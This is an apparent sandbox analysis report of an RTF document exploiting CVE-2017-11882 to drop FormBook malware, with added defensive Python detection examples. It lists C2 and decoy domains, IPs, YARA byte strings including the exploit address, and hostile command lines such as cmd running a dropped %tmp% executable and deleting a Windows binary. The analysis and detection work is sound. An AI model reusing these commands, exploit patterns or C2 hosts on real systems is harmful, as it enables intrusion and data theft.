
Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID: 680528
MD5: 8bfea104ae681494896379e3c647f6ae
SHA1: aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256: 2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags: rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Document contains OLE streams with names of living off the land binaries
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
PE file contains section with special chars
Sample uses process hollowing technique
Office process drops PE file
Writes to foreign memory regions
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3000 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2708 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 316 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: B4F00BB75BFD5C4E2C9D0CD6070E8E54)
        • notepad.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • ipconfig.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
              • cmd.exe (PID: 1740 cmdline: /c del "C:\Windows\SysWOW64\notepad.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}
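The process tree above is the detection surface for this sample: EQNEDT32.EXE is started by DCOM with -Embedding (which is why it sits at the top level rather than under WINWORD.EXE, and why parent-is-Office rules miss it) and has no business spawning children; the dropper runs from %TEMP%; and the last cmd.exe deletes a binary under C:\Windows. Note also that the sandbox draws explorer.exe under notepad.exe because notepad injected into it; in EDR telemetry explorer.exe keeps its normal parent and only the ipconfig.exe child is visible, so a rule has to key on the child, not on the injected host. The Python below is an added example, not part of the Joe Sandbox report: it runs those four rules over constructed process-creation events modelled on the tree (PIDs, images and command lines copied from it; the parent PIDs of the top-level processes, the rule names, the LOLBin list and the Temp-path regex are my assumptions).

```python
import re

# Constructed process-creation events modelled on the tree above. PIDs, images
# and command lines are copied from the report; parent PIDs of the two
# top-level processes and of explorer.exe are assumptions.
EVENTS = [
    {"pid": 3000, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'},
    {"pid": 3060, "ppid": 1, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 2708, "ppid": 3060, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"CmD.exe /C %tmp%\Client.exe A C"},
    {"pid": 316, "ppid": 2708, "image": r"C:\Users\user\AppData\Local\Temp\Client.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\Client.exe A C"},
    {"pid": 2188, "ppid": 316, "image": r"C:\Windows\SysWOW64\notepad.exe",
     "cmdline": r"C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}"},
    {"pid": 1860, "ppid": 1, "image": r"C:\Windows\Explorer.EXE", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 1800, "ppid": 1860, "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": r"C:\Windows\SysWOW64\ipconfig.exe"},
    {"pid": 1740, "ppid": 1800, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Windows\SysWOW64\notepad.exe"'},
]

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
UTILITIES = {"ipconfig.exe", "notepad.exe", "calc.exe"}   # assumed list: never legitimately spawn a shell
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)
DEL_RE = re.compile(r'/c\s+del\s+"?c:\\windows\\', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Walk parent links upward; stops at a missing parent or a cycle."""
    chain, seen, cur = [], set(), by_pid.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid.get(cur["ppid"])
        if cur is not None:
            chain.append(cur)
    return chain


def detect(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # Equation Editor is an out-of-process COM server; any child is an exploit.
        if pname == "eqnedt32.exe":
            alerts.append((e["pid"], "equation-editor-child"))
        # A LOLBin (here ipconfig.exe running injected code) spawning a shell.
        if name in SHELLS and pname in UTILITIES:
            alerts.append((e["pid"], "utility-spawns-shell"))
        # Anything under %TEMP% with an Office host somewhere in its ancestry.
        if TEMP_RE.search(e["image"]) and any(
                basename(a["image"]) in OFFICE_HOSTS for a in ancestors(by_pid, e["pid"])):
            alerts.append((e["pid"], "office-chain-runs-temp-exe"))
        # cmd /c del against a path under C:\Windows (cleanup of the hollowed host).
        if name == "cmd.exe" and DEL_RE.search(e["cmdline"]):
            alerts.append((e["pid"], "deletes-windows-binary"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Run over the constructed events, this flags cmd.exe (2708) as an Equation Editor child, Client.exe (316) as a Temp executable with an Office host in its chain, and the final cmd.exe (1740) twice, once as a shell spawned by ipconfig.exe and once for the del against C:\Windows. The ancestry walk is what makes the Temp rule survive the cmd.exe hop in between; a parent-only rule would see cmd.exe as the parent and miss it.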
Source | Rule | Description | Author | Strings
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | MAL_RTF_Embedded_OLE_PE | Detects a suspicious string often used in PE files in a hex encoded object stream | Florian Roth
  • 0x1799:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465 (hex encoding of the DOS stub text "This program cannot be run in DOS mode")
  • 0x16fd:$m1: 4d5a90000300000004000000ffff (hex encoding of a standard MZ header)
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1283:$obj2: \objdata
  • 0x1dc298:$obj2: \objdata
  • 0x2bc8ae:$obj3: \objupdate
  • 0x8e8:$obj4: \objemb
  • 0x1db8fd:$obj4: \objemb
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | rtf_cve2017_11882_ole | Attempts to identify the exploit CVE 2017 11882 | John Davison
  • 0xebc00:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A (Equation Native stream header ending in the MTEF header bytes)
  • 0xebc21:$font: 0A 01 08 5A 5A (MTEF FONT record tag followed by the start of an overlong font name)
  • 0xebc52:$winexec: 12 0C 43 00 (little-endian 0x00430C12, which the rule labels as the WinExec call address)
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | EXP_potential_CVE_2017_11882 | unknown | ReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xebb00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xebc29:$exe: .exe
  • 0xebc3d:$exe: .exe
  • 0xebc52:$address: 12 0C 43 00
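The two tables above describe the same object twice: in the RTF it is a hex-encoded \objdata blob (so the MZ header and DOS stub only appear as hex text, which is what MAL_RTF_Embedded_OLE_PE keys on), and once Word writes it out as ~WRF{...}.tmp it is a plain OLE2 file whose Equation Native stream carries the MTEF header, a FONT record with an overlong name, and the 0x00430C12 value the CVE-2017-11882 rules look for. The following Python is an added example, not part of the report or of any of the YARA authors' tooling: it decodes the \objdata blobs of an RTF and applies the same byte patterns to the decoded bytes. The byte constants come from the YARA strings above; the 32-byte font-name threshold, the RTF wrapper used for the test fixtures and the absence of any OLE1/CFB parsing are my assumptions.

```python
import re

# Byte patterns taken from the YARA strings in the tables above.
MZ_HEADER = bytes.fromhex("4d5a90000300000004000000ffff")
DOS_STUB = bytes.fromhex("546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465")
CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
EQ_NATIVE = b"Equation Native"
EQ_COMPOBJ = b"Microsoft Equation 3.0"
MTEF_HEADER = bytes.fromhex("030101030a")     # tail of $headers
FONT_TAG = bytes.fromhex("0a0108")            # start of $font
RET_ADDR = bytes.fromhex("120c4300")          # $winexec / $address, 0x00430C12 little-endian
LONG_FONT_NAME = 32   # assumed threshold: a legitimate MTEF font name is a dozen or so bytes

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objdata(rtf):
    """Return the decoded bytes of every \\objdata hex blob in an RTF file."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        digits = re.sub(rb"\s+", b"", m.group(1))
        digits = digits[: len(digits) // 2 * 2]        # tolerate a trailing odd nibble
        if digits:
            blobs.append(bytes.fromhex(digits.decode("ascii")))
    return blobs


def longest_font_name(blob):
    """Longest NUL-terminated name following a FONT record tag (0 if none)."""
    longest, pos = 0, blob.find(FONT_TAG)
    while pos >= 0:
        start = pos + len(FONT_TAG)
        end = blob.find(b"\x00", start)
        longest = max(longest, (len(blob) if end < 0 else end) - start)
        pos = blob.find(FONT_TAG, pos + 1)
    return longest


def scan_blob(blob):
    return {
        "ole2": CFB_MAGIC in blob,
        "embedded_pe": MZ_HEADER in blob and DOS_STUB in blob,
        "equation": EQ_NATIVE in blob or EQ_COMPOBJ in blob,
        "mtef_header": MTEF_HEADER in blob,
        "long_font_name": longest_font_name(blob) >= LONG_FONT_NAME,
        "ret_addr": RET_ADDR in blob,
        "exe_strings": blob.count(b".exe"),
    }


def verdict(rtf):
    hits = []
    for i, blob in enumerate(extract_objdata(rtf)):
        f = scan_blob(blob)
        if f["embedded_pe"]:
            hits.append((i, "embedded PE in objdata"))
        if f["equation"] and (f["long_font_name"] or f["ret_addr"]):
            hits.append((i, "possible CVE-2017-11882 Equation Native object"))
    return hits


def wrap(payload):
    """Constructed minimal RTF wrapper around one hex-encoded object (test fixture only)."""
    return b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata " + payload.hex().encode() + b"}}}"


# Constructed fixtures: a hex-encoded PE, a synthetic Equation Native object with
# an overlong FONT name followed by the flagged 4-byte value, and a benign equation.
SAMPLE_PE = wrap(MZ_HEADER + b"\x00" * 50 + DOS_STUB + b"\x00" * 8)
SAMPLE_EQ = wrap(CFB_MAGIC + EQ_COMPOBJ + b"\x00" * 8 + EQ_NATIVE + b"\x00" * 8
                 + MTEF_HEADER + FONT_TAG + b"Z" * 44 + RET_ADDR + b"\x00")
SAMPLE_OK = wrap(CFB_MAGIC + EQ_NATIVE + b"\x00" * 8 + MTEF_HEADER + FONT_TAG + b"Times New Roman\x00")

if __name__ == "__main__":
    for name, sample in (("pe", SAMPLE_PE), ("eq", SAMPLE_EQ), ("ok", SAMPLE_OK)):
        print(name, verdict(sample))
```

Two caveats for real samples. First, the \objdata hex in exploit documents is routinely broken up with interleaved control words, comments and \bin runs (the "Obfuscated" in this sample's name), and the regex above stops at the first non-hex character; rtfobj from oletools handles that and is the right tool outside a demo. Second, the decoded blob is an OLE1 wrapper around the CFB file, not a bare CFB file, so the patterns are searched across the whole blob rather than by parsing streams; the byte offsets in the YARA output above (0xebc00 and neighbours inside a ~1 MB file) show why a naive "Equation Native near the start" check would fail.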
Source | Rule | Description | Author | Strings
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
54 further memory-dump entries omitted.
Source | Rule | Description | Author | Strings
9.0.notepad.exe.400000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.0.notepad.exe.400000.3.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.0.notepad.exe.400000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.notepad.exe.400000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
9.0.notepad.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
47 further unpacked-PE entries omitted.
          No Sigma rule has matched
Timestamp: 08/08/22-18:39:45.738853
SID: 2031449
Source: 192.168.2.22:49171
Destination: 66.235.200.170:80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031449
Source: 192.168.2.22:49172
Destination: 104.167.67.175:80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:39:45.738853
SID: 2031453
Source: 192.168.2.22:49171
Destination: 66.235.200.170:80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031453
Source: 192.168.2.22:49172
Destination: 104.167.67.175:80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:39:45.738853
SID: 2031412
Source: 192.168.2.22:49171
Destination: 66.235.200.170:80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031412
Source: 192.168.2.22:49172
Destination: 104.167.67.175:80
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: www.lundadonate.xyz/nb30/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Virustotal: Detection: 43%
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | ReversingLabs: Detection: 21%
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Client.exe | ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Joe Sandbox ML: detected
Source: 9.0.notepad.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed above)

          Exploits

Source: Static RTF information | Object: 1 Offset: 001DC2BCh
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Stream path '_1721489049/\x1CompObj': ...................F....Microsoft Equation 3.0....
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: Client.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: global traffic | TCP traffic: 192.168.2.22:49171 <-> 66.235.200.170:80 (15 entries in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49172 <-> 104.167.67.175:80 (10 entries in both directions)
Source: global traffic | DNS query: name: www.thegoldencamel.online
Source: global traffic | DNS query: name: www.best-boy.net
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 4x nop then pop ebx (2 occurrences)
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 4x nop then pop edi

          Networking

